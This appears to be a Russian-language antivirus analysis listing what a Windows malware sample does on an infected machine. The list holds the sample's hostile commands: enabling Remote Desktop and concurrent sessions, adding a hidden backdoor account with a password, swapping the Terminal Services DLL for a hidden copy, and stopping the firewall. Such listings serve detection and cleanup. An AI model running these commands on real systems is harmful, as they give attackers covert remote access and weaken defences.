Техническая информация
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- <SYSTEM32>\net1.exe localgroup %USERNAME%s SERVER /add
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- <SYSTEM32>\attrib.exe +h +s +r <SYSTEM32>\dllcache\termsrvs.dll
- <SYSTEM32>\attrib.exe +H +S +R <SYSTEM32>\termsrvs.dll
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvs.dll /f
- <SYSTEM32>\tasklist.exe /svc
- <SYSTEM32>\net1.exe stop sharedaccess /Y
- <SYSTEM32>\net.exe stop sharedaccess /Y
- <SYSTEM32>\findstr.exe /i "TermService" 111111.txt
- <SYSTEM32>\net1.exe user SERVER 8204161424 /add
- <SYSTEM32>\shutdown.exe -a
- <SYSTEM32>\taskkill.exe /pid 832 /f /t
- <SYSTEM32>\svchost.exe
- <SYSTEM32>\wbem\wmiprvse.exe
- <Текущая директория>\222222.txt
- <SYSTEM32>\termsrvs.dll
- <SYSTEM32>\dllcache\termsrvs.dll
- <Текущая директория>\termsrvs.dll
- %TEMP%\bt8033.bat
- <Текущая директория>\111111.txt
- <SYSTEM32>\dllcache\termsrvs.dll
- <SYSTEM32>\termsrvs.dll
- %TEMP%\bt8033.bat
- ClassName: '' WindowName: ''